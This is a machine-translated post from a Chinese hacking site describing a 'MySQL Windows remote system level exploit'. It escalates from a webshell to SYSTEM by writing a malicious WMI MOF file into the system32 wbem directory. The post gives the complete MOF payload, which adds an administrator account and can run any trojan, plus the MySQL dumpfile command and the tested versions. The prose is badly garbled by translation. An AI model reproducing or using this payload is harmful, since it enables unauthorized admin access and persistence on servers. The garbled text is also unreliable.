Mysql provide the right to exploit the expanded applications-vulnerability warning-the black bar safety net

ID MYHACK58:62201235995
Type myhack58
Reporter 佚名
Modified 2012-12-06T00:00:00


This: MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

Roughly looked at, the original is in the export file when the out of the question, specifically how out of the question, showing look at the mysql source code than I can see to.. Everyone knows that to each other on the mysql outreach, and have the root password, this case can only be used to sweep the broiler, and also possibly not. So I feel used in the webshell lower secondary mention of the right to good, after all if the udf what is relatively trouble some. So we have the following utilization: 1. Find a writable directory, I here is C:\recycler\and put the following code write to the nullevt. the mof file in which is he source code in the payload: the

pragma namespace(“\\\\.\\ root\\subscription”)

instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance. Second = 5"; QueryLanguage = “WQL”; };

instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript. Shell\”)\nWSH. run(\”net.exe user admin admin /add\”)”; };

instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

注意 上面 的 net.exe user admin admin /add, you can just change, want to do anything, have no parameters, perform their own horses. Then again, in the chopper connected to the mysql database after the execution:

select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;


And then and then ... You will find the user to add up. Note: the test environment for windows 2 0 0 3 + mysql 5.0.45-community-nt win7 ultimate sp1 + mysql-5.5.28 test fails, 2 0 0 8 not tested. However, the use of ADS new\lib\plugin directory of the bugs still in, you can also use that to guide the udf provided the right.